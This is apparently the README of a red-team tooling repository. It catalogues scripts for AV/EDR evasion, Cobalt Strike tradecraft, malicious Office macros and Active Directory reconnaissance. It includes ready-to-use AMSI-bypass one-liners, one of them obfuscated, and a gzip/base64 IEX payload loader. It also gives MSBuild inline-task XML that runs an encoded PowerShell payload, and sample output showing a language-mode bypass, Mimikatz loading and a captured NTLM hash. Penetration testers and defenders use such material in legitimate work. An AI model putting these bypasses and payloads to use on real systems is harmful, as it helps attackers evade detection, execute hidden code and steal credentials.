.. | ||
bloodhound | ||
Bypass-ConstrainedLanguageMode | ||
C3-Client | ||
cobalt-arsenal@77a14e020e | ||
CobaltSplunk@b36229fdb6 | ||
code-exec-templates | ||
ElusiveMice@b18def7a66 | ||
EvilClippy@361f16eb52 | ||
LAPS-Backdoor | ||
OfficePurge@6066fd47e6 | ||
RedWarden@1ce441eb14 | ||
rogue-dot-net | ||
SharpWebServer@d93487d805 | ||
SharpWMI@afbf3860cb | ||
Stracciatella@3c3e059908 | ||
backdoor-drop.js | ||
clickOnceSharpPickTemplate.cs | ||
cmstp-template.inf | ||
compressedPowershell.py | ||
Count-PrivilegedGroupMembers.ps1 | ||
Create-Lnk.ps1 | ||
Dealing with LAPS using PowerView 3.0+.md | ||
Decode-UnattendPassword.ps1 | ||
delete-warning-div-macro.vbs | ||
Disable-Amsi.ps1 | ||
Disable-ScriptLogging.ps1 | ||
Download-Cradles-Oneliners.md | ||
Export-ReconData.ps1 | ||
Find-GPODelegatedUsers.ps1 | ||
generateMSBuildXML.py | ||
Get-DomainOUTree.ps1 | ||
Get-UserPasswordEntries.ps1 | ||
Invoke-Command-Cred-Example.ps1 | ||
msbuild-powershell-msgbox.xml | ||
muti-stage-1.md | ||
README.md | ||
Save-ReconData.ps1 | ||
set-handler.rc | ||
Set-PrincipalAllowedToDelegateToAccount.ps1 | ||
SubstitutePageMacro.vbs |
Red Teaming and Social-Engineering related scripts, tools and CheatSheets
-
backdoor-drop.js
- Internet Explorer - JavaScript trojan/backdoor dropper template, to be used during Penetration Testing assessments. (gist) -
bloodhound
- bunch of BloodHound utilities & scripts -
Bypass-ConstrainedLanguageMode
- Tries to bypass AppLocker Constrained Language Mode via custom COM object (as documented by @xpn in: https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/ ) The way it does so is by registering a custom COM object (InProcServer32
DLL) that will act as a native .NET CLR4 host. This host is then going to load up a managed assembly within it's current AppDomain. That assembly finally will switchSessionData.LanguageMode
variable determining whether Constrained Language Mode shall be used within current Runspace. More details in the tool directory itself.
PS > $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage
PS > .\Bypass-CLM.ps1
AppLocker Constrined Language Mode Bypass via COM
(implementation of: @xpn's technique, as documented in:)
(https://www.mdsec.co.uk/2018/09/applocker-clm-bypass-via-com/)
Re-implemented, enhanced by: Mariusz Banach, mgeeky
-----
[.] Step 0. Planted DLL files in:
C:\Users\danj\AppData\Local\Temp\ClmDisableAssembly.dll
C:\Users\danj\AppData\Local\Temp\ClmDisableDll.dll
[.] Step 1. Creating custom COM object.
[.] Step 2. Invoking it (ClmDisableDll)...
Powershell runspace Thread ID: 8716
[+] Managed mode assembly. Disabling CLM globally.
Current thread ID (managed/unmanaged): 8 / 8716
Passed argument: '(called from native CLR host)'
============
Use below command to disable CLM on Demand (ignore errors):
PS> New-Object -ComObject ClmDisableDll
============
[+] Finished. CLM status: FullLanguage
PS > New-Object -ComObject ClmDisableDll
PS > $ExecutionContext.SessionState.LanguageMode
FullLanguage
-
C3-Client
- A lightweight F-Secure's C3 client script letting you setup an alarm on incoming Relay, continuously ping your Relays, Clear commands queues in various channels, and others. Might be useful while working with the framework. -
clickOnceSharpPickTemplate.cs
- This is a template for C# Console Project containing SharpPick technique of loading Powershell code from within C# application. The ClickOnce concept is to generate a windows self-updating Application that is specially privileged (ClickOnce) -
cmstp-template.inf
- INF file being a smallest possible template for CMSTP code execution technique, as described by LOLBAS project. Sample usage:
cmstp.exe /ni /s cmstp.inf
-
cobalt-arsenal
- A set of my published Cobalt Strike 4.0+ compatible aggressor scripts. That includes couple of my handy utils I've used on various engagements. -
CobaltSplunk
- Originally devised by Vincent Yiu, heavily reworked by me: a Splunk application that ingests, indexes and exposes several search operators to work with Cobalt Strike logs from within of a Splunk interface. Supports Cobalt Strike 4.3+ log files syntax. Gives a lot of flexibility to work with Teamserver log files, search through them, generate insightful reports/dashboards/pivot tables and much more. -
code-exec-templates
- a small collection of template/backbone files for various code-execution techniques (VBScript/JScript embedded in HTA/SCT/XSL/VBS/JS) -
compressedPowershell.py
- Creates a Powershell snippet containing GZIP-Compressed payload that will get decompressed and executed (IEX) . (gist)Example:
$s = New-Object IO.MemoryStream(, [Convert]::FromBase64String('H4sIAMkfcloC/3u/e390cGVxSWquXlBqWk5qcklmfp6eY3Fxam5STmWslZVPfmJKeGZJRkBiUUlmYo5fYm6qhhJUR3hmXkp+ebGeW35RbrGSpkKNgn9pia5faU6ONS9XNDZFer6pxcWJ6alO+RVAs4Mz8ss11D1LFMrzi7KLFdU1rQFOfXYfjwAAAA=='));
IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipStream($s, [IO.Compression.CompressionMode]::Decompress))).ReadToEnd();
-
Count-PrivilegedGroupMembers.ps1
- Counts number of members in predefined (or augumented from an input file) list of privileged, sensitive groups in Active Directory. Purely for statistics and overview purposes. -
Create-Lnk.ps1
- Uttertly simple script to create LNK files. Handy when one needs to create some dodgy shortcuts acting as yet another stage in code execution step. -
Disable-Amsi.ps1
- Tries to evade AMSI by leveraging couple of publicly documented techniqus, but in an approach to avoid signatured or otherwise considered harmful keywords.
Using a hash-lookup approach when determining prohibited symbol names, we are able to avoid relying on blacklisted values and having them hardcoded within the script. This implementation iterates over all of the assemblies, their exposed types, methods and fields in order to find those that are required but by their computed hash-value rather than direct name. Since hash-value computation algorithm was open-sources and is simple to manipulate, the attacker becomes able to customize hash-lookup scheme the way he likes.
PS > "amsiInitFailed"
At line:1 char:1
+ "amsiInitFailed"
+ ~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
PS > . .\Disable-Amsi.ps1
PS > Disable-Amsi
[+] Disabled Script Block logging.
[+] Success via technique 1.
PS > "amsiInitFailed"
amsiInitFailed
-
OH, by the way - you can grab my custom AMSI evasion oneliners below - perfect for a one-shot use cases:
- Technique 1A: Overwrite
AmsiUtils.amsiContext
's object (_HAMSICONTEXT.Signature
) byte. Length: 146 bytes.
[Runtime.InteropServices.Marshal]::WriteByte((([Ref].Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5)
- Technique 1B: Same as 1A, but obfuscated variant. (256 bytes)
$h=[TyPE]('{5}{2}{4}{0}{3}{1}'-f'er','L','Un','viCes.maRShA','TIME.INTErOPS','r');Sv('W'+'e') ([tYpe]('{1}{0}'-f'EF','r'));(gET-vAriABLE h).vAlue::WriteByte((($wE.Assembly.GetTypes()|?{$_-clike'*Am*ls'}).GetFields(40)|?{$_-clike'*xt'}).GetValue($null),0x5)
- Technique 1A: Overwrite
-
Disable-ScriptLogging.ps1
- Tries to evade Script Block logging by leveraging couple of publicly documented techniqus, but in an approach to avoid signatured or otherwise considered harmful keywords.
Warning: This scriptlet should be launched first, before Disable-Amsi.ps1
for better OpSec experience.
-
Download-Cradles-Oneliners.md
- Various Powershell Download Cradles purposed as one-liners (gist) -
ElusiveMice
- Cobalt Strike's User-Defined Reflective Loader with AV/EDRs evasion in mind. Utilizes AMSI, ETW and WLDP (Windows Lockdown Policy) memory patches that thwart some optics monitored by EDRs. -
Export-ReconData.ps1
- Powershell script leveraging PowerSploit Recon module (PowerView) to save output from Reconnaissance cmdlets likeGet-*
,Find-*
into Clixml files. Those files (stored in an output directory as separate XML files) can later be extracted from attacked environment and loaded to a new powershell runspace using the same script. Very useful when we want to obtain as many data as possible, then exfiltrate that data, review it in our safe place and then get back to attacked domain for lateral spread. Warning: Be careful though, as this script launches many reconnaissance commands one by one, this WILL generate a lot of noise. Microsoft ATA for instance for sure pick you up with "Reconnaissance using SMB session enumeration" after you've launchedInvoke-UserHunter
.WARNING: This script is compatible with newer version of PowerView (coming from dev branch as of 2018), that exposed various
Get-Domain*
,Find-*
cmdlets. In order to save recon's data from the older PowerView, refer to mySave-ReconData.ps1
script in this directory.Exposed functions:
Export-ReconData
- Launches many cmdlets and exports their Clixml outputs.Import-ReconData -DirName <DIR>
- Loads Clixml previously exported outputs and stores them in Global variables reachable when script terminates.Get-ReconData -DirName <DIR>
- Gets names of variables that were created and contains previously imported data.
PS E:\PowerSploit\Recon> Load-ReconData -DirName .\PowerView-12-18-2018-08-30-09
Loaded $FileFinderSearchSYSVol results.
Loaded $FileFinder results.
Loaded $ForeignGroup results.
Loaded $ForeignUser results.
Loaded $GPOLocation results.
Loaded $MapDomainTrust results.
Loaded $NetComputer results.
Loaded $NetDomain results.
Loaded $NetDomainController results.
Loaded $NetDomainTrust results.
Loaded $NetFileServer results.
Loaded $NetForest results.
Loaded $NetForestCatalog results.
Loaded $NetForestDomain results.
Loaded $NetForestTrust results.
Loaded $NetGPO results.
Loaded $NetGPOGroup results.
Loaded $NetGroup results.
Loaded $NetGroupMember results.
Loaded $NetLocalGroup results.
Loaded $NetLoggedon results.
Loaded $NetOU results.
Loaded $NetProcess results.
Loaded $NetRDPSession results.
Loaded $NetSession results.
Loaded $NetShare results.
Loaded $NetSite results.
Loaded $NetSubnet results.
Loaded $NetUserAdminCount results.
Loaded $NetUser results.
Loaded $ShareFinder results.
Loaded $StealthUserHunterShowAll results.
Loaded $UserHunterShowAll results.
-
EvilClippy
- my fork of original Stan Hegt's enhanced with support for Office pre-2007 and Office 2007+ file formats (PowerPoint, Publisher, Excel, Word) -
Find-GPODelegatedUsers.ps1
- One-liner for finding GPO Delegated users that can Edit Settings of that GPO and thus could be used to Abuse GPO Permissions (https://www.harmj0y.net/blog/redteaming/abusing-gpo-permissions/). gist -
Get-UserPasswordEntries.ps1
- a simple script for finding and decodinguserPassword
properties stored by some legacy SAMBA/linux kerberos implementations. -
generateMSBuildXML.py
- Powershell via MSBuild inline-task XML payload generation script - To be used during Red-Team assignments to launch Powershell payloads without usingpowershell.exe
(gist)
This script can embed following data within constructed CSharp Task:
- Powershell code
- raw Shellcode to executed in a separate thread via CreateThread
- .NET Assembly reflectively loaded via Assembly.Load
Example output **not minimized**:
C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1
:: Powershell via MSBuild inline-task XML payload generation script
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
[?] File not recognized as PE/EXE.
------------------------------------------------------------------------------------
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- Based on Casey Smith work, Twitter: @subTee -->
<!-- Automatically generated using `generateMSBuildXML.py` utility -->
<!-- by Mariusz Banach / mgeeky <mb@binary-offensive.com> -->
<Target Name="btLDoraXcZV">
<hwiJYmWvD />
</Target>
<UsingTask TaskName="hwiJYmWvD" TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Reference Include="System.Management.Automation" />
<Code Type="Class" Language="cs">
<![CDATA[
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class hwiJYmWvD : Task {
public override bool Execute() {
byte[] payload = System.Convert.FromBase64String("JHMgPSBOZXctT2JqZWN0IElPLk1lbW9yeVN0cmVhbSgsIFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnSDRzSUFJOUxjbG9DLzN1L2UzOTBjR1Z4U1dxdVhsQnFXazVxY2tsbWZwNmVZM0Z4YW01U1RtV3NsWlZQZm1KS2VHWkpSa0JpVVVsbVlvNWZZbTZxaGhKVVIzaG1Ya3ArZWJHZVczNVJickdTcGtLTmduOXBpYTVmYVU2T05TOVhORFpGZXI2cHhjV0o2YWxPK1JWQXM0TXo4c3MxMUQxTEZNcnppN0tMRmRVMXJRRk9mWFlmandBQUFBPT0nKSk7IElFWCAoTmV3LU9iamVjdCBJTy5TdHJlYW1SZWFkZXIoTmV3LU9iamVjdCBJTy5Db21wcmVzc2lvbi5HemlwU3RyZWFtKCRzLCBbSU8uQ29tcHJlc3Npb24uQ29tcHJlc3Npb25Nb2RlXTo6RGVjb21wcmVzcykpKS5SZWFkVG9FbmQoKTs=");
string decoded = System.Text.Encoding.UTF8.GetString(payload);
Runspace runspace = RunspaceFactory.CreateRunspace();
runspace.Open();
Pipeline pipeline = runspace.CreatePipeline();
pipeline.Commands.AddScript(decoded);
pipeline.Invoke();
runspace.Close();
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
------------------------------------------------------------------------------------
minimized
C:\Users\IEUser\Desktop\files\video>python generateMSBuildXML.py Show-Msgbox.ps1 -m
:: Powershell via MSBuild inline-task XML payload generation script
To be used during Red-Team assignments to launch Powershell payloads without using 'powershell.exe'
Mariusz Banach / mgeeky, <mb@binary-offensive.com>
[?] File not recognized as PE/EXE.
------------------------------------------------------------------------------------
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003"><Target Name="mYOYInAFWE"><DpaYaokgauWBJbe /></Target><UsingTask TaskName="DpaYaokgauWBJbe" TaskFactory="CodeTaskFactory" AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll"><Task><Reference Include="System.Management.Automation" /><Code Type="Class" Language="cs"><![CDATA[using System.Management.Automation;using System.Management.Automation.Runspaces;using Microsoft.Build.Framework;using Microsoft.Build.Utilities;public class DpaYaokgauWBJbe:Task{public override bool Execute(){byte[] x=System.Convert.FromBase64String("JHMgPSBOZXctT2JqZWN0IElPLk1lbW9yeVN0cmVhbSgsIFtDb252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnSDRzSUFMQkxjbG9DLzN1L2UzOTBjR1Z4U1dxdVhsQnFXazVxY2tsbWZwNmVZM0Z4YW01U1RtV3NsWlZQZm1KS2VHWkpSa0JpVVVsbVlvNWZZbTZxaGhKVVIzaG1Ya3ArZWJHZVczNVJickdTcGtLTmduOXBpYTVmYVU2T05TOVhORFpGZXI2cHhjV0o2YWxPK1JWQXM0TXo4c3MxMUQxTEZNcnppN0tMRmRVMXJRRk9mWFlmandBQUFBPT0nKSk7IElFWCAoTmV3LU9iamVjdCBJTy5TdHJlYW1SZWFkZXIoTmV3LU9iamVjdCBJTy5Db21wcmVzc2lvbi5HemlwU3RyZWFtKCRzLCBbSU8uQ29tcHJlc3Npb24uQ29tcHJlc3Npb25Nb2RlXTo6RGVjb21wcmVzcykpKS5SZWFkVG9FbmQoKTs=");string d=System.Text.Encoding.UTF8.GetString(x);Runspace r=RunspaceFactory.CreateRunspace();r.Open();Pipeline p=r.CreatePipeline();p.Commands.AddScript(d);p.Invoke();r.Close();return true;}}]]></Code></Task></UsingTask></Project>
------------------------------------------------------------------------------------
Get-DomainOUTree.ps1
- Collects OU lines returned from PowerView'sGet-NetOU
/Get-DomainOU
cmdlet, and then prints that structure as a Organizational Units tree.
This scriptlet works with both older version of PowerView that got implemented Get-NetOU
cmdlet, by passing its output via pipeline to Get-NetOUTree
:
PS E:\PowerSploit\Recon> Get-NetOU | Get-NetOUTree
or with new version of PowerView coming with it's Get-DomainOU
cmdlet.
PS E:\PowerSploit\Recon> Get-DomainOU | Get-DomainOUTree
+ CONTOSO
+ SharedFolders
+ Departments
+ IT
+ SALES
+ LAWYERS
+ CHIEFS
+ AUDIT
+ HR
+ Software
+ Computers
+ Workstations
+ Servers
+ Data
+ Infrastructure
+ SOC
+ Groups
+ Users
+ Partners
+ Employees
+ Admins
+ Domain Controllers
+ Microsoft Exchange Security Groups
-
Invoke-Command-Cred-Example.ps1
- Example of using PSRemoting with credentials passed directly from command line. (gist) -
msbuild-powershell-msgbox.xml
- Example of Powershell execution via MSBuild inline task XML file. On a simple Message-Box script. (gist) -
muti-stage-1.md
- Multi-Stage Penetration-Testing / Red Teaming Malicious Word document creation process. (gist) -
OfficePurge
- my fork of original Mandiant's OfficePurge enhanced with support for Office 2007+ and a few other features -
RedWarden
- A Cobalt Strike C2 Reverse proxy fending off Blue Teams, AVs, EDRs, scanners through packet inspection and malleable profile correlation. -
rogue-dot-net
- Set of scripts, requirements and instructions for generating .NET Assemblies valid for Regasm/Regsvcs/InstallUtil code execution primitives. -
Save-ReconData.ps1
- Powershell script leveraging PowerSploit Recon module (PowerView) to save output from Reconnaissance cmdlets likeGet-*
,Find-*
into Clixml files. It differs fromExport-ReconData.ps1
in that it supports only older PowerView version from before 12 dec 2016. Exposed functions:Save-ReconData
- Launches many cmdlets and exports their Clixml outputs.Load-ReconData -DirName <DIR>
- Loads Clixml previously exported outputs and stores them in Global variables reachable when script terminates.Get-ReconData -DirName <DIR>
- Gets names of variables that were created and contains previously imported data.
-
set-handler.rc
- Quickly set metasploit's multi-handler + web_delivery (separated) handler for use with powershell. (gist) -
SharpWebServer
- Red Team oriented C# Simple HTTP Server with Net-NTLMv1/2 hashes capture functionality
C:\> SharpWebServer.exe port=8888 dir=C:\Windows\Temp verbose=true ntlm=true
:: SharpWebServer ::
a Red Team oriented C# Simple HTTP Server with Net-NTLMv1/2 hashes capture functionality
[.] Serving HTTP server on port : 8888
[.] Will run for this long : 60 seconds
[.] Verbose mode turned on.
[.] NTLM mode turned on.
[.] Serving files from directory : C:\Windows\Temp
SharpWebServer [29.03.21, 17:55:14] NTLM: Sending 401 Unauthorized due to lack of Authorization header.
SharpWebServer [29.03.21, 17:55:14] ::1 - "GET /test.txt" - len: 0 (401)
SharpWebServer [29.03.21, 17:55:14] NTLM: Sending 401 Unauthorized with NTLM Challenge Response.
SharpWebServer [29.03.21, 17:55:14] ::1 - "GET /test.txt" - len: 0 (401)
[+] SharpWebServer: Net-NTLM hash captured:
TestUser:::1122334455667788:66303EE2DF9417E2FE07E1B7FD663205:010100000000000092EC04E8B324D701C2B561D5FECBB325000000000200060053004D0042000100160053004D0042002D0054004F004F004C004B00490054000400120073006D0062002E006C006F00630061006C000300280073006500720076006500720032003000300033002E0073006D0062002E006C006F00630061006C000500120073006D0062002E006C006F00630061006C00080030003000000000000000010000000020000045E18A336DA58F5F0F826F846C699F77DCCF02BA5135525AC52EFBB0C0A1F1160A0010000000000000000000000000000000000009001C0048005400540050002F006C006F00630061006C0068006F00730074000000000000000000
SharpWebServer [29.03.21, 17:55:14] ::1 - "GET /test.txt" - len: 11 (200)
-
SharpWMI
- This implementation is a refurbished and enhanced version of original SharpWMI by @harmj0y that adds some more flexibility for working with malicious VBS scripts, AMSI evasion, file upload purely via WMI and makes it possible to return output from WMI remotely executed commands. Initially submitted as a Pull Request #3 to the original repo of that project, however unless it's merged there - will pin my fork here for accountability -
Stracciatella
- Powershell runspace from within C# (akaSharpPick
technique) with AMSI and Script Block Logging disabled for your pleasure.- This program provides functionality to decode passed parameters on the fly, using Base64 and Xor single-byte decode (also combined)
- Before launching any command, it makes sure to disable AMSI using two approaches
- Before launching any command, it makes sure to disable Script Block logging using two approaches
- This program does not patch any system library, system native code (think amsi.dll)
- Efforts were made to not store decoded script/commands excessively long, in order to protect itself from memory-dumping techniques governed by EDRs and AVs
- The resulting binary may be considered bit too large, that's because
Costura.Fody
NuGet package is used which bundlesSystem.Management.Automation.dll
within resulting assembly
PS D:\> Stracciatella.exe -v -b -x 0x31 -c "ZkNYRVQceV5CRRETeEURRl5DWkIRXVhaVBFQEVJZUENcEBMRChEVdElUUkRFWF5fcl5fRVRJRR9iVEJCWF5fYkVQRVQffVBfVkRQVlR8XlVU" .\Test2.ps1
:: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.
Mariusz Banach / mgeeky, '19 <mb@binary-offensive.com>
[.] Will load script file: '.\Test2.ps1'
[+] AMSI Disabled.
[+] Script Block Logging Disabled.
[.] Language Mode: FullLanguage
PS> & '.\Test2.ps1'
PS> Write-Host "It works like a charm!" ; $ExecutionContext.SessionState.LanguageMode
[+] Yeeey, it really worked.
It works like a charm!
FullLanguage
PS D:\> "amsiInitFailed"
At line:1 char:1
+ "amsiInitFailed"
+ ~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
PS D:\> . .\Invoke-Mimikatz.ps1
At line:1 char:1
+ . .\Invoke-Mimikatz.ps1
+ ~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your antivirus software.
+ CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
+ FullyQualifiedErrorId : ScriptContainedMaliciousContent
PS D:\> .\Stracciatella.exe -v
:: Stracciatella - Powershell runspace with AMSI and Script Block Logging disabled.
Mariusz Banach / mgeeky, '19 <mb@binary-offensive.com>
[-] It looks like no script path was given.
[+] AMSI Disabled.
[+] Script Block Logging Disabled.
[.] Language Mode: FullLanguage
Stracciatella D:\> . .\Invoke-Mimikatz.ps1
Stracciatella D:\> Invoke-Mimikatz -Command "coffee ; exit"
.#####. mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
.## ^ ##. "A La Vie, A L'Amour"
## / \ ## /* * *
## \ / ## Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
'## v ##' http://blog.gentilkiwi.com/mimikatz (oe.eo)
'#####' with 20 modules * * */
mimikatz(powershell) # coffee
( (
) )
.______.
| |]
\ /
`----'
mimikatz(powershell) # ;
SubstitutePageMacro.vbs
- This is a template for the Malicious Macros that would like to substitute primary contents of the document (like luring/fake warnings to "Enable Content") and replace document's contents with what is inside of an AutoText namedRealDoc
(configured via variableautoTextTemplateName
). (gist)